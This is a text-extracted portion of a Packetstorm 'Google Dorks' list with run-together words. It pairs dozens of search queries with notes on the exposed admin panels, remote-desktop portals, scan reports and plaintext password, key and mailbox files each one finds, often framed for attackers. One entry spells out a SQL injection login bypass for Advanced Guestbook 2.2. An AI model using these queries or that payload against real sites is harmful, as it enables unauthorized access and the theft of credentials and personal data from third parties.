being able to find these in Google giveshackers an informational advantage,and many of the sites are notimplemented securely.

intitle:"TerminalServices WebConnection"

intitle:"Terminal Services WebConnection"

Microsoft Terminal Services WebConnector pages. These pages are notnecessarily insecure, sine many layersof security can be wrapped around theactual use of this service, but simplybeing able to find these in Google giveshackers an informational advantage,and many of the sites are notimplemented securely. In the worstcase scenario these pages may allow anattacker to bypass a firewall gainingaccess to a "protected" machine.

intitle:"RemoteDesktop WebConnection"

intitle:"Remote Desktop WebConnection"

Microsoft Remote Desktop ConnectionWeb Connection pages. These pagesare not necessarily insecure, sine manylayers of security can be wrappedaround the actual use of this service,but simply being able to find these inGoogle gives hackers an informationaladvantage, and many of the sites arenot implemented securely. In the worstcase scenario these pages may allow anattacker to bypass a firewall gainingaccess to an otherwise inaccessiblemachine.

"Welcome toIntranet" "Welcome to Intranet"

According to whatis.com: "An intranetis a private network that is containedwithin an enterprise. [...] The mainpurpose of an intranet is to sharecompany information and computingresources among employees [...] and ingeneral looks like a private version ofthe Internet." Intranets, by definitionshould not be available to the Internet'sunwashed masses as they may containprivate corporate information.

inurl:search.phpvbulletin inurl:search.php vbulletin

Version 3.0.0 candidate 4 and earlier ofVbulletin may have a cross-sitescripting vulnerability. Seehttp://www.securityfocus.com/bid/9656 for more info.

Page 22: Packetstorm Google Dorks List

inurl:footer.inc.php inurl:footer.inc.php

Fromhttp://www.securityfocus.com/bid/9664, the AllMyPHP family of products(Versions 0.1.2 - 0.4) contains severalpotential vulnerabilities, som elalowingan attacker to execute malicious codeon the web server.

inurl:info.inc.php inurl:info.inc.php

Fromhttp://www.securityfocus.com/bid/9664, the AllMyPHP family of products(Versions 0.1.2 - 0.4) contains severalpotential vulnerabilities, som elalowingan attacker to execute malicious codeon the web server.

inurl:adminintitle:login inurl:admin intitle:login

This search can find administrativelogin pages. Not a vulnerability in andof itself, this query serves as a locatorfor administrative areas of a site.Further investigation of thesurrounding directories can oftenreveal interesting information.

intitle:adminintitle:login intitle:admin intitle:login

This search can find administrativelogin pages. Not a vulnerability in andof itself, this query serves as a locatorfor administrative areas of a site.Further investigation of thesurrounding directories can oftenreveal interesting information.

filetype:asp"Custom ErrorMessage"Category Source

filetype:asp "Custom ErrorMessage" Category Source

This is an ASP error message that canreveal information such as compilerused, language used, line numbers,program names and partial sourcecode.

"Fatal error: Callto undefinedfunction" -reply -the -next

"Fatal error: Call to undefinedfunction" -reply -the -next

This error message can revealinformation such as compiler used,language used, line numbers, programnames and partial source code.

inurl:adminfiletype:xls inurl:admin filetype:xls

This search can find Excel spreadsheetsin an administrative directory or of anadministrative nature. Many timesthese documents contain sensitiveinformation.

inurl:admininurl:userlist inurl:admin inurl:userlist This search reveals userlists of

administrative importance. Userlists

Page 23: Packetstorm Google Dorks List

found using this method can rangefrom benign "message group" lists tosystem userlists containing passwords.

inurl:adminfiletype:aspinurl:userlist

inurl:admin filetype:aspinurl:userlist

This search reveals userlists ofadministrative importance. Userlistsfound using this method can rangefrom benign "message group" lists tosystem userlists containing passwords.

inurl:backupintitle:index.ofinurl:admin

inurl:backup intitle:index.ofinurl:admin

This query reveals backup directories.These directories can contain variousinformation ranging from source code,sql tables, userlists, and evenpasswords.

"Welcome to PHP-Nuke"congratulations

"Welcome to PHP-Nuke"congratulations

This finds default installations of thepostnuke CMS system. In many cases,default installations can be insecureespecially considering that theadministrator hasn't gotten past the firstfew installation steps.

allintitle:NetscapeFastTrack ServerHome Page

allintitle:Netscape FastTrack ServerHome Page

This finds default installations ofNetscape Fasttrack Server. In manycases, default installations can beinsecure especially considering that theadministrator hasn't gotten past the firstfew installation steps.

"Welcome tophpMyAdmin" "Create newdatabase"

"Welcome to phpMyAdmin" "Create new database"

phpMyAdmin is a widly spreadwebfrontend used to mantain sqldatabases. The default securitymechanism is to leave it up to theadmin of the website to put a .htaccessfile in the directory of the application.Well gues what, obviously someadmins are either too lazy or don'tknow how to secure their directories.These pages should obviously not beaccessable to the public without somekind of password ;-)

intitle:"Index ofc:\Windows" intitle:"Index of c:\Windows"

These pages indicate that they aresharing the C:\WINDOWS directory,which is the system folder for manyWindows installations.

warning "error online" php sablotron

warning "error on line" phpsablotron

sablotron is an XML toolit thingie.This query hones in on error messagesgenerated by this toolkit. These error

Page 24: Packetstorm Google Dorks List

messages reveal all sorts of interestingstuff such as source code snippets, pathand filename info, etc.

"Most SubmittedForms and Scripts""this section"

"Most Submitted Forms andScripts" "this section"

More www statistics on the web. Thisone is very nice.. Lots of directory info,and client access statistics, emailaddresses.. lots of good stuff.These areSOOO dangerous, especially ifINTRANET users get logged... talkabout mapping out an intranetquickly...

inurl:changepassword.asp inurl:changepassword.asp

This is a common script for changingpasswords. Now, this doesn't actuallyreveal the password, but it providesgreat information about the securitylayout of a server. These links can beused to troll around a website.

"Select a databaseto view"intitle:"filemakerpro"

"Select a database to view"intitle:"filemaker pro"

An oldie but a goodie. This searchlocates servers which provides accessto Filemaker pro databases via the web.The severity of this search varieswildly depending on the security of thedatabase itself. Regardless, if Googlecan crawl it, it's potentially usingcleartext authentication.

"not fordistribution"confidential

"not for distribution" confidential

The terms "not for distribution" andconfidential indicate a sensitivedocument. Results vary wildly, butweb-based documents are for publicviewing, and should neither beconsidered confidential or private.

"Thank you foryour order"+receipt

"Thank you for your order" +receipt

After placing an order via the web,many sites provide a page containingthe phrase "Thank you for your order"and provide a receipt for futurereference. At the very least, these pagescan provide insight into the structure ofa web-based shop.

allinurl:intranetadmin allinurl:intranet admin

According to whatis.com: "An intranetis a private network that is containedwithin an enterprise. [...] The mainpurpose of an intranet is to sharecompany information and computingresources among employees [...] and in

Page 25: Packetstorm Google Dorks List

general looks like a private version ofthe Internet." Intranets, by definitionshould not be available to the Internet'sunwashed masses as they may containprivate corporate information. Some ofthese pages are simply portals to anIntranet site, which helps withinformation gathering.

intitle:"NessusScan Report""This file wasgenerated byNessus"

intitle:"Nessus Scan Report" "Thisfile was generated by Nessus"

This search yeids nessus scan reports.Even if some of the vulnerabilitieshave been fixed, we can still gathervaluable information about thenetwork/hosts. This also works withISS and any other vulnerability scannerwhich produces reports in html or textformat.

intitle:"index.of.personal" intitle:"index.of.personal" This directory has various personal

documents and pictures.

"This report lists""identified byInternet Scanner"

"This report lists" "identified byInternet Scanner"

This search yeids ISS scan reports,revealing potential vulnerabilities onhosts and networks. Even if some ofthe vulnerabilities have been fixed,information about the network/hostscan still be gleaned.

"Network HostAssessmentReport" "InternetScanner"

"Network Host Assessment Report""Internet Scanner"

This search yeids ISS scan reports,revealing potential vulnerabilities onhosts and networks. Even if some ofthe vulnerabilities have been fixed,information about the network/hostscan still be gleaned.

"NetworkVulnerabilityAssessmentReport"

"Network Vulnerability AssessmentReport"

This search yeids vulnerability scannerreports, revealing potentialvulnerabilities on hosts and networks.Even if some of the vulnerabilitieshave been fixed, information about thenetwork/hosts can still be gleaned.

"HostVulnerabilitySummary Report"

"Host Vulnerability SummaryReport"

This search yeids host vulnerabilityscanner reports, revealing potentialvulnerabilities on hosts and networks.Even if some of the vulnerabilitieshave been fixed, information about thenetwork/hosts can still be gleaned.

intitle:index.ofinbox intitle:index.of inbox This search reveals potential location

for mailbox files. In some cases, the

Page 26: Packetstorm Google Dorks List

data in this directory or file may be of avery personal nature and may includesent and received emails and archivesof email data.

intitle:index.ofinbox dbx intitle:index.of inbox dbx

This search reveals potential locationfor mailbox files. In some cases, thedata in this directory or file may be of avery personal nature and may includesent and received emails and archivesof email data.

intitle:index.ofcleanup.log intitle:index.of inbox dbx

This search reveals potential locationfor mailbox files by keying on theOutlook Express cleanup.log file. Insome cases, the data in this directory orfile may be of a very personal natureand may include sent and receivedemails and archives of email data.

"#mysql dump"filetype:sql "#mysql dump" filetype:sql

This reveals mySQL database dumps.These database dumps list the structureand content of databases, which canreveal many different types of sensitiveinformation.

allinurl:install/install.php allinurl:install/install.php

Pages with install/install.php files maybe in the process of installing a newservice or program. These servers maybe insecure due to insecure defaultsettings. In some cases, these serversmay allow for a new installation of aprogram or service with insecuresettings. In other cases, snapshot dataabout an install process can be gleanedfrom cached page images.

inurl:vbstats.php"page generated" inurl:vbstats.php "page generated"

This is your typical stats page listingreferrers and top ips and such. Thisinformation can certainly be used togather information about a site and itsvisitors.

"index of" / lck "index of" / lck

These lock files often containusernames of the user that has lockedthe file. Username harvesting can bedone using this technique.

"Index of" /"chat/logs" "Index of" / "chat/logs"

This search reveals chat logs.Depending on the contents of the logs,these files could contain just about

Page 27: Packetstorm Google Dorks List

anything!

index.ofperform.ini index.of perform.ini

This file contains information about themIRC client and may include channeland user names.

"SnortSnarf alertpage" "SnortSnarf alert page"

snort is an intrusion detection system.SnorfSnarf creates pretty web pagesfrom intrusion detection data. Thesepages show what the bad guys aredoing to a system. Generally, it's a badidea to show the bad guys what you'venoticed.

inurl:"newsletter/admin/"intitle:"newsletteradmin"

inurl:"newsletter/admin/"intitle:"newsletter admin"

These pages generally containnewsletter administration pages. Someof these site are password protected,others are not, allowing unauthorizedusers to send mass emails to an entiremailing list.

inurl:"newsletter/admin/" inurl:"newsletter/admin/"

These pages generally containnewsletter administration pages. Someof these site are password protected,others are not, allowing unauthorizedusers to send mass emails to an entiremailing list. This is a less acuratesearch than the similarintitle:"newsletter admin" search.

inurl:phpSysInfo/"created byphpsysinfo"

inurl:phpSysInfo/ "created byphpsysinfo"

This statistics program allows the anadmin to view stats about a webserver.Some sites leave this in a publicallyaccessible web page. Hackers couldhave access to data such as the real IPaddress of the server, server memoryusage, general system info such as OS,type of chip, hard-drive makers andmuch more.

allinurl: adminmdb allinurl: admin mdb

Not all of these pages areadministrator's access databasescontaining usernames, passwords andother sensitive information, but manyare!

allinurl:"exchange/logon.asp" allinurl:"exchange/logon.asp"

According to Microsoft "Microsoft (R)Outlook (TM) Web Access is aMicrosoft Exchange Active ServerApplication that gives you privateaccess to your Microsoft Outlook or

Page 28: Packetstorm Google Dorks List

Microsoft Exchange personal e-mailaccount so that you can view yourInbox from any Web Browser. It alsoallows you to view Exchange serverpublic folders and the Address Bookfrom the World Wide Web. Anyonecan post messages anonymously topublic folders or search for users in theAddress Book. " Now, consider for amoment and you will understand whythis could be potentially bad.

intitle:"Index of"cfide intitle:"Index of" cfide

This is the top level directory ofColdFusion, a powerful webdevelopment environment. Thisdirectory most likely contains sensitiveinformation about a ColdFusiondeveloped site.

intitle:"ColdFusionAdministratorLogin"

intitle:"ColdFusion AdministratorLogin"

This is the default login page forColdFusion administration. Althoughmany of these are secured, this is anindicator of a default installation, andmay be inherantly insecure. In addition,this search provides good informationabout the version of ColdFusion aswell as the fact that ColdFusion isinstalled on the server.

intitle:"ErrorOccurred" "Theerror occurred in"filetype:cfm

intitle:"Error Occurred" "The erroroccurred in" filetype:cfm

This is a typical error message fromColdFusion. A good amount ofinformation is available from an errormessage like this including lines ofsource code, full pathnames, SQLquery info, database name, SQL stateinfo and local time info.

inurl:login.cfm inurl:login.cfm

This is the default login page forColdFusion. Although many of theseare secured, this is an indicator of adefault installation, and may beinherantly insecure. In addition, thissearch provides good informationabout the version of ColdFusion aswell as the fact that ColdFusion isinstalled on the server.

filetype:cfm"cfapplication

filetype:cfm "cfapplication name"password

These files contain ColdFusion sourcecode. In some cases, the pages are

Page 29: Packetstorm Google Dorks List

name" password examples that are found in discussionforums. However, in many cases thesepages contain live sourcecode withusernames, database names orpasswords in plaintext.

inurl:":10000"intext:webmin inurl:":10000" intext:webmin

Webmin is a html admin interface forUnix boxes. It is run on a proprietaryweb server listening on the default portof 10000.

allinurl:/examples/jsp/snp/snoop.jsp allinurl:/examples/jsp/snp/snoop.jsp

These pages reveal information aboutthe server including path information,port information, etc.

allinurl:servlet/SnoopServlet allinurl:servlet/SnoopServlet

These pages reveal server informationsuch as port, server software version,server name, full paths, etc.

intitle:"Test Pagefor Apache" intitle:"Test Page for Apache"

This is the default web page forApache 1.2.6 - 1.3.9. Hackers can usethis information to determine theversion of the web server, or to searchGoogle for vulnerable targets. Inaddition, this indicates that the webserver is not well maintained.

inurl:login.asp inurl:login.asp

This is a typical login page. It hasrecently become a target for SQLinjection. Comsec's article athttp://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.phpbrought this to my attention.

inurl:/admin/login.asp inurl:/admin/login.asp

This is a typical login page. It hasrecently become a target for SQLinjection. Comsec's article athttp://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.phpbrought this to my attention.

"Running in Childmode" "Running in Child mode"

This is a gnutella client that was pickedup by google. There is a lot of datapresent including transfer statistics,port numbers, operating system,memory, processor speed, ip addresses,and gnutella client versions.

"This is a ShareazaNode" "This is a Shareaza Node"

These pages are from Shareaza clientprograms. Various data is displayedincluding client version, ip address,

Page 30: Packetstorm Google Dorks List

listening ports and uptime.

"VNC Desktop"inurl:5800 "VNC Desktop" inurl:5800

VNC is a remote-controlled desktopproduct. Depending on theconfiguration, remote users may not bepresented with a password. Even whenpresented with a password, the mereexistance of VNC can be important toan attacker, as is the open port of 5800.

"index of cgi-bin" "index of cgi-bin"

CGI directories contain scripts whichcan often be exploited by attackers.Regardless of the vulnerability of suchscripts, a directory listing of thesescripts can prove helpful.

intitle:Snap.Serverinurl:Func= intitle:Snap.Server inurl:Func=

This page reveals the existance of aSNAP server (Netowrk attached serveror NAS devices) Depending on theconfiguration, these servers may bevulnerable, but regardless the existanceof this server is useful for informationgathering.

inurl:server-status"apache" inurl:server-status "apache"

This page shows all sort of informationabout the Apache web server. It can beused to track process information,directory maps, connection data, etc.

eggdropfiletype:user user eggdrop filetype:user user

These are eggdrop config files.Avoiding a full-blown descussionabout eggdrops and IRC bots, suffice itto say that this file contains usernamesand passwords for IRC users.

intitle:"index of"intext:connect.inc intitle:"index of" intext:connect.inc

These files often contain usernamesand passwords for connection to mysqldatabases. In many cases, thepasswords are not encoded orencrypted.

intitle:"MikroTikRouterOSManagingWebpage"

intitle:"MikroTik RouterOSManaging Webpage"

This is the front page entry point to a"Mikro Tik" Router.

inurl:fcgi-bin/echo inurl:fcgi-bin/echo

This is the fastcgi echo script, whichprovides a great deal of informationincluding port numbers, serversoftware versions, port numbers, ipaddresses, path names, file names, time

Page 31: Packetstorm Google Dorks List

zone, process id's, admin email, fqdns,etc!

inurl:cgi-bin/printenv inurl:cgi-bin/printenv

This is the print environemnts scriptwhich lists sensitive information suchas path names, server names, portnumbers, server software and versionnumbers, administrator email addressesand more.

intitle:"Executionof this script notpermitted"

intitle:"Execution of this script notpermitted"

This is a cgiwrap error message whichdisplays admin name and email, portnumbers, path names, and may alsoinclude optional information like phonenumbers for support personnel.

inurl:perl/printenv inurl:perl/printenv

This is the print environemnts scriptwhich lists sensitive information suchas path names, server names, portnumbers, server software and versionnumbers, administrator email addressesand more.

inurl:j2ee/examples/jsp inurl:j2ee/examples/jsp

This directory contains sample JSPscripts which are installed on theserver. These programs may havesecurity vulnerabilities and can be usedby an attacker to footprint the server.

inurl:ojspdemos inurl:ojspdemos

This directory contains sample OracleJSP scripts which are installed on theserver. These programs may havesecurity vulnerabilities and can be usedby an attacker to footprint the server.

inurl:server-info"Apache ServerInformation"

inurl:server-info "Apache ServerInformation"

This is the Apache server-infoprogram. There is so much sensitivestuff listed on this page that it's hard tolist it all here. Some informatino listedhere includes server version and build,software versions, hostnames, ports,path info, modules installed, moduleinfo, configuration data and so muchmore....

inurl:pls/admin_/gateway.htm inurl:pls/admin_/gateway.htm

This is a default login portal used byOracle. In addition to the fact that thisfile can be used to footprint a webserver and determine it's version andsoftware, this page has been targeted inmany vulnerability reports as being a

Page 32: Packetstorm Google Dorks List

source of an SQL injectionvulnerability. This problem, whenexploited can lead to unauthorizedprivileges to the databse. In addition,this page may allow unauthorizedmodification of parameters on theserver.

inurl:/pls/sample/admin_/help/ inurl:/pls/sample/admin_/help/

This is the default installation locationof Oracle manuals. This helps infootprinting a server, allowing anattacker to determine software versioninformation which may aid in anattack.

intitle:"GatewayConfigurationMenu"

intitle:"Gateway ConfigurationMenu"

This is a normally protectedconfiguration menu for Oracle PortalDatabase Access Descriptors (DADs)and Listener settings. This page isnormally password protected, butGoogle has uncovered sites which arenot protected. Attackers can makechanges to the servers found with thisquery.

intitle:"RemoteDesktop WebConnection"inurl:tsweb

intitle:Remote.Desktop.Web.Connection inurl:tsweb

This is the login page for Microsoft'sRemote Desktop Web Connection,which allows remote users to connectto (and optionally control) a user'sdesktop. Although authentication isbuilt into this product, it is still possibleto run this service withoutauthentication. Regardless, this searchserves as a footprinting mechanisms foran attacker.

inurl:phpinurl:hlstatsintext:"ServerUsername"

inurl:php inurl:hlstats intext:"ServerUsername"

This page shows the halflife stat scriptand reveals the username to the system.Table structure, database name andrecent SQL queries are also shown onmost systems.

intext:"TobiasOetiker" "trafficanalysis"

intext:"Tobias Oetiker" "trafficanalysis"

This is the MRTG traffic analysispages. This page lists informationabout machines on the networkincluding CPU load, traffic statistics,etc. This information can be useful inmapping out a network.

inurl:tdbin inurl:tdbin This is the default directory for

Page 33: Packetstorm Google Dorks List

TestDirector(http://www.mercuryinteractive.com/products/testdirector/). This programcontains sensitive informationincluding software defect data whichshould not be publically accessible.

+intext:"webalizer" +intext:"TotalUsernames"+intext:"UsageStatistics for"

+intext:"webalizer" +intext:"TotalUsernames" +intext:"UsageStatistics for"

The webalizer program displaysvarious information but this querydisplays usernames that have loggedinto the site. Attckers can use thisinformation to mount an attack.

inurl:performfiletype:ini inurl:perform filetype:ini

Displays the perform.ini file used bythe popular irc client mIRC. Oftentimes has channel passwords and/orlogin passwords for nickserv.

intitle:"index of"intext:globals.inc intitle:"index of" intext:globals.inc contains plaintext user/pass for mysql

database

filetype:pdf"AssessmentReport" nessus

filetype:pdf "Assessment Report"nessus

These are reports from the NessusVulnerability Scanner. These reportcontain detailed information about thevulnerabilities of hosts on a network, averitable roadmap for attackers tofolow.

inurl:"smb.conf"intext:"workgroup" filetype:confconf

inurl:"smb.conf"intext:"workgroup" filetype:conf

These are samba configuration files.They include information about thenetwork, trust relationships, useraccounts and much more. Attackerscan use this information to recon anetwork.

intitle:"SambaWebAdministrationTool" intext:"HelpWorkgroup"

intitle:"Samba Web AdministrationTool" intext:"Help Workgroup"

This search reveals wide-open sambaweb adminitration servers. Attackerscan change options on the server.

filetype:propertiesinurl:dbintext:password

filetype:properties inurl:dbintext:password

The db.properties file containsusernames, decrypted passwords andeven hostnames and ip addresses ofdatabase servers. This is VERY severe,earning the highest danger rating.

inurl:names.nsf?opendatabase inurl:names.nsf?opendatabase

A Login portal for Lotus Dominoservers. Attackers can attack this pageor use it to gather information about theserver.

Page 34: Packetstorm Google Dorks List

"index of"inurl:recycler "index of" inurl:recycler

This is the default name of theWindows recycle bin. The files in thisdirectory may contain sensitiveinformation. Attackers can also crawlthe directory structure of the site to findmore information. In addition, the SIDof a user is revealed also. An attackercould use this in a variety of ways.

filetype:confinurl:firewall -intitle:cvs

filetype:conf inurl:firewall -intitle:cvs

These are firewall configuration files.Although these are often examples orsample files, in many cases they canstill be used for information gatheringpurposes.

filetype:incintext:mysql_connect

filetype:inc intext:mysql_connect

INC files have PHP code within themthat contain unencrypted usernames,passwords, and addresses for thecorresponding databases. Verydangerous stuff. The mysql_connectfile is especially dangerous because ithandles the actual connection andauthentication with the database.

"HTTP_FROM=googlebot"googlebot.com"Server_Software="

"HTTP_FROM=googlebot"googlebot.com "Server_Software="

These pages contain trace informationthat was collected when the googlebotcrawled a page. The information caninclude many different things such aspath names, header information, serversoftware versions and much more.Attackers can use information like thisto formulate an attack against a site.

"Request Details""Control Tree""Server Variables"

"Request Details" "Control Tree""Server Variables"

These pages contain a great deal ofinformation including path names,session ID's, stack traces, portnumbers, ip addresses, and much muchmore. Attackers can use thisinformation to formulate a veryadvanced attack against these targets.

filetype:reg reg+intext:"defaultusername"+intext:"defaultpassword"

filetype:reg reg+intext:"defaultusername"+intext:"defaultpassword"

These pages display windows registrykeys which reveal passwords and/orusernames.

inurl:metaframexp/default/login.asp |intitle:"Metaframe

inurl:metaframexp/default/login.asp| intitle:"Metaframe XP Login"

These are Citrix Metaframe loginportals. Attackers can use these toprofile a site and can use insecure

Page 35: Packetstorm Google Dorks List

XP Login" setups of this application to access thesite.

inurl:/Citrix/Nfuse17/ inurl:/Citrix/Nfuse17/

These are Citrix Metaframe loginportals. Attackers can use these toprofile a site and can use insecuresetups of this application to access thesite.

filetype:wab wab filetype:wab wab

These are Microsoft Outlook Mailaddress books. The informationcontained will vary, but at the least anattacker can glean email addresses andcontact information.

filetype:reg regHKEY_CURRENT_USERusername

filetype:reg regHKEY_CURRENT_USERusername

This search finds registry files from theWindows Operating system.Considered the "soul" of the system,these files, and snippets from thesefiles contain sensitive information, inthis case usernames and/or passwords.

filetype:reg regHKEY_CURRENT_USERSSHHOSTKEYS

filetype:reg regHKEY_CURRENT_USERSSHHOSTKEYS

This search reveals SSH host key frothe Windows Registry. These filescontain information about where theuser connects including hostnames andport numbers, and shows sensitiveinformation such as the SSH host keyin use by that client.

inurl:/tmp inurl:/tmp

Many times, this search will revealtemporary files and directories on theweb server. The information includedin these files and directories will vary,but an attacker could use thisinformation in an informationgathering campaign.

filetype:mbx mbxintext:Subject filetype:mbx mbx intext:Subject

These searches reveal Outlook v 1-4 orEudora mailbox files. Often these aremade public on purpose, sometimesthey are not. Either way, addresses andemail text can be pulled from thesefiles.

intitle:"eMule *"intitle:"- WebControl Panel"intext:"WebControl Panel""Enter your

intitle:"eMule *" intitle:"- WebControl Panel" intext:"Web ControlPanel" "Enter your password here."

This iks the login page for eMule, thep2p file-sharing program. These pagesforego the login name, prompting onlyfor a password. Attackers can use thisto profile a target, gather informationand ultimately upload or download

Page 36: Packetstorm Google Dorks List

password here." files from the target (which is afunction of the emule program itself)

inurl:"webadmin"filetype:nsf inurl:"webadmin" filetype:nsf This is a standard login page for

Domino Web Administration.

filetype:reg reg+intext:"internetaccount manager"

filetype:reg reg +intext:"internetaccount manager"

This google search reveals usersnames, pop3 passwords, emailaddresses, servers connected to andmore. The IP addresses of the users canalso be revealed in some cases.

filetype:eml eml+intext:"Subject"+intext:"From"+intext:"To"

filetype:eml eml +intext:"Subject"+intext:"From"

These are oulook express email fileswhich contain emails, with fullheaders. The information in theseemails can be useful for informationgathering about a target.

inurl:vtund.confintext:pass -cvs inurl:vtund.conf intext:pass -cvs

Theses are vtund configuration files(http://vtun.sourceforge.net). Vtund isan encrypted tunneling program. Theconf file holds plaintext passwords.Many sites use the default password,but some do not. Regardless, attackerscan use this information to gatherinformation about a site.

inurl:loginfiletype:swf swf inurl:login filetype:swf swf

This search reveals sites which may beusing Shockwave (Flash) as a loginmechanism for a site. The usernamesand passwords for this type of loginmechanism are often stored in plaintextinside the source of the .swl file.

filetype:url+inurl:"ftp://"+inurl:"@"

filetype:url +inurl:"ftp://"+inurl:"@"

These are FTP Bookmarks, some ofwhich contain plaintext login namesand passwords.

intitle:guestbook"advancedguestbook 2.2powered"

intitle:guestbook "advancedguestbook 2.2 powered"

Advanced Guestbook v2.2 has an SQLinjection problem which allowsunauthorized access. AttackerFromthere, hit "Admin" then do thefollowing:Leave username fieldblank.For password, enter thisexactly:') OR ('a' = 'aYou are now inthe Guestbook's Adminsection.http://www.securityfocus.com/bid/10209

intitle:"300multiple choices" intitle:"300 multiple choices" This search shows sites that have the

300 error code, but also reveal a server

Page 37: Packetstorm Google Dorks List

tag at the bottom of the page that anattacker could use to profile a system.

intitle:"index of"mysql.conf ORmysql_config

intitle:"index of" mysql.conf ORmysql_config

This file contains port number, versionnumber and path info to MySQLserver.

filetype:lic licintext:key filetype:lic lic intext:key

License files for various software titlesthat may contain contact info and theproduct version, license, andregistration in a .LIC file.

"please log in" "please log in"

This is a simple search for a login page.Attackers view login pages as the"front door" to a site, but theinformation about where this page isstored and how it is presented canprovide clues about breaking into asite.

filetype:logusername putty filetype:log username putty

These log files record info about theSSH client PUTTY. These files containusernames, site names, IP addresses,ports and various other informationabout the SSH server connected to.

filetype:loginurl:"password.log"

filetype:log inurl:"password.log"

These files contain cleartext usernamesand passwords, as well as the sitesassociated with those credentials.Attackers can use this information tolog on to that site as that user.

intitle:"DellRemote AccessController"

intitle:"Dell Remote AccessController"

This is the Dell Remote AccessController that allows remoteadministration of a Dell server.

filetype:vsd vsdnetwork -samples -examples

filetype:vsd vsd network -samples -examples

Reveals network maps (or any otherkind you seek) that can providesensitive information such as internalIPs, protocols, layout, firewalllocations and types, etc. Attackers canuse these files in an informationgathering campaign.

intitle:intranetinurl:intranet+intext:"humanresources"

intitle:intranet inurl:intranet+intext:"human resources"

According to whatis.com: "An intranetis a private network that is containedwithin an enterprise. [...] The mainpurpose of an intranet is to sharecompany information and computingresources among employees [...] and ingeneral looks like a private version of

Page 38: Packetstorm Google Dorks List

the Internet."This search allows you tonot only access a companies privatenetwork, but also provides employeelistings and other sensitive informationthat can be incredibly useful for anysocial engineering endeavour

filetype:logcron.log filetype:log cron.log

Displays logs from cron, the *nixautomation daemon. Can be used todetermine backups, full and realtivepaths, usernames, IP addresses and portnumbers of trusted network hosts, orjust about anything the admin of thebox decides to automate. An attackercould use this information to possiblydetermine what extra vulnerableservices are running on the machine, tofind the location of backups, and, if thesysadmin uses cron to backup theirlogfiles, this cron log will give thataway too.

filetype:logaccess.log -CVS filetype:log access.log -CVS

These are http server access logs whichcontain all sorts of information rangingfrom usernames and passwords totrusted machines on the network to fullpaths on the server. Could be VERYuseful in scoping out a potential target.

filetype:blt blt+intext:screenname

filetype:blt blt +intext:screennameReveals AIM buddy lists, includingscreenname and who's on their 'buddy'list and their 'blocked' list.

filetype:dat"password.dat" filetype:dat "password.dat"

This file contains plaintext usernamesand password. Deadly information inthe hands of an attacker.

intitle:intranetinurl:intranet+intext:"phone"

intitle:intranet inurl:intranet+intext:"phone"

These pages are often private intranetpages which contain phone listings andemail addresses. These pages can beused as a sort of online "dumpsterdive".

filetype:confslapd.conf filetype:conf slapd.conf

slapd.conf is the file that contains allthe configuration for OpenLDAP,including the root password, all in cleartext. Other useful information that canbe gleaned from this file includes fullpaths of other related installedapplications, the r/w/e permissions for

Page 39: Packetstorm Google Dorks List

various files, and a bunch of otherstuff.

inurl:php.inifiletype:ini inurl:php.ini filetype:ini

The php.ini file contains all theconfiguration for how PHP is parsed ona server. It can contain default databaseusernames, passwords, hostnames, IPaddresses, ports, initialization of globalvariables and other information. Sinceit is found by default in /etc, you mightbe able to find a lot more unrelatedinformation in the same directory.

inurl:domcfg.nsf inurl:domcfg.nsf

This will return a listing of serversrunning Lotus Domino. These serversby default have very descriptive errormessages which can be used to obtainpath and OS information. In addition,adding "Login Form Mapping" to thesearch will allow you to see detailedinformation about a few of the serversthat have this option enabled.

filetype:pemintext:private filetype:pem intext:private

This search will find private key files...Private key files are supposed to be,well... private.

"Mecury Version""InfastructureGroup"

"Mecury Version" "InfastructureGroup"

Mecury is a centralized ground controlprogram for research satellites. Thisquery simply locates servers runningthis software. As it seems to runprimarily on PHP and MySQL, thereare many possible vulnerabilitiesassociated with it.

filetype:confinurl:proftpd.conf-sample

filetype:conf inurl:proftpd.conf -sample

A standard FTP configuration file thatprovides far too many details abouthow the server is setup, includinginstallation paths, location of logfiles,generic username and associated group,etc

+htpasswd+WS_FTP.LOGfiletype:log

+htpasswd +WS_FTP.LOGfiletype:log

WS_FTP.LOG can be used in manyways to find more information about aserver. This query is very flexible, justsubstitute "+htpasswd" for"+FILENAME" and you may getseveral hits that you hadn't seen withthe 'normal' search. Filenamessuggested by the forum to explore are:

Page 40: Packetstorm Google Dorks List

phpinfo, admin, MySQL, password,htdocs, root, Cisco, Oracle, IIS,resume, inc, sql, users, mdb, frontpage,CMS, backend, https, editor, intranet .The list goes on and on..A differentapproach might be "allinurl:"some.host.com" WS_FTP.LOGfiletype:log" which tells you moreabout who's uploading files to aspecific site.

"error foundhandling therequest" cocoonfiletype:xml

"error found handling the request"cocoon filetype:xml

Cocoon is an XML publishingframework. It allows you to defineXML documents and transformationsto be applied on it, to eventuallygenerate a presentation format of yourchoice (HTML, PDF, SVG). For moreinformation readhttp://cocoon.apache.org/2.1/overview.htmlThis Cocoon error displays libraryfunctions, cocoon version number, andfull and/or relative path names.

intitle:"Big Sister"+"OK AttentionTrouble"

intitle:"Big Sister" +"OK AttentionTrouble"

This search reveals Internal networkstatus information about services andhosts.

inurl:"/cricket/grapher.cgi" inurl:"/cricket/grapher.cgi"

This search reveals information aboutinternal networks, such asconfiguration, services, bandwidth.

inurl:"cacti"+inurl:"graph_view.php" +"SettingsTree View" -cvs -RPM

inurl:"cacti"+inurl:"graph_view.php" +"SettingsTree View" -cvs -RPM

This search reveals internal networkinfo including architecture, hosts andservices available.

intitle:"SystemStatistics"+"System andNetworkInformationCenter"

intitle:"System Statistics" +"Systemand Network Information Center"

This search reveals internal networkinformation including networkconfiguratino, ping times, services, andhost info.

inurl:"wvdial.conf"intext:"password"

inurl:"wvdial.conf"intext:"password"

The wvdial.conf is used for dialupconnections.it contains phone numbers,usernames and passwords in cleartext.

filetype:incdbconn filetype:inc dbconn

This file contains the username andpassword the website uses to connectto the db. Lots of these Google results

Page 41: Packetstorm Google Dorks List

don't take you straight to 'dbconn.inc',instead they show you an errormessage -- that shows you exactlywhere to find dbconn.inc!!

inurl:"slapd.conf"intext:"credentials"-manpage -"Manual Page" -man: -sample

inurl:"slapd.conf"intext:"credentials" -manpage -"Manual Page" -man: -sample

slapd.conf is the configuration file forslapd, the opensource LDAP deamon.The key "credentinals" containspasswords in cleartext.

inurl:"slapd.conf"intext:"rootpw" -manpage -"ManualPage" -man: -sample

inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample

slapd.conf is the configuration file forslapd, the opensource LDAP deamon.You can view a cleartext or cryptedpassword for the "rootdn".

